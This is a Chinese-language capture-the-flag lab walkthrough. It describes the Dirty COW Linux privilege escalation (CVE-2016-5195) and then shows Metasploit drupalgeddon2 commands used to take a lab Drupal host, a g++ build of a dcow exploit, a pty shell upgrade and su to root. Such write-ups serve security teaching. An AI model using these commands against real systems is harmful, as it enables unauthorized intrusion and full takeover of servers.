一、脏牛漏洞介绍

脏牛漏洞(Dirty COW),也被称为DCOW,漏洞编号CVE-2016-5195,是Linux内核中存在的一个本地提权漏洞。

1.1 漏洞原理

该漏洞利用了Copy-on-Write机制中的一个竞态条件(Race Condition),攻击者可以利用这个竞态条件来获取对一个本来只读的文件的写权限,从而提升为本地管理员权限。

1.2 漏洞影响范围

Linux kernel >= 2.6.22(2007年发行,到2016年10月18日才修复)

1.3 漏洞危害

攻击者可以利用该漏洞来提升非特权用户的权限,从而获得管理员权限。

二、靶场环境

靶机下载地址

攻击机(Kali):192.168.40.132
靶机:192.168.40.11

2.1 端口扫描

2.2 指纹识别

在网站可以看到是Drupal的CMS,网上可以查到利用漏洞

这里演示MSF集成的漏洞利用模块

msfconsole
search drupal
use exploit/unix/webapp/drupal_drupalgeddon2
set rhost 192.168.40.11
set rport 1898
run

成功获取到web权限

2.3 提权

  1. 上传漏洞检测脚本

  2. 运行检测脚本

    exp下载地址

  3. 上传exp

  4. 编译
    g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow dcow.cpp -lutil

  5. 运行

  6. 切换用户

注:需要交互式shell才能行,否则会卡住
python -c 'import pty; pty.spawn("/bin/bash")'

su然后输入密码即可

7. 获取flag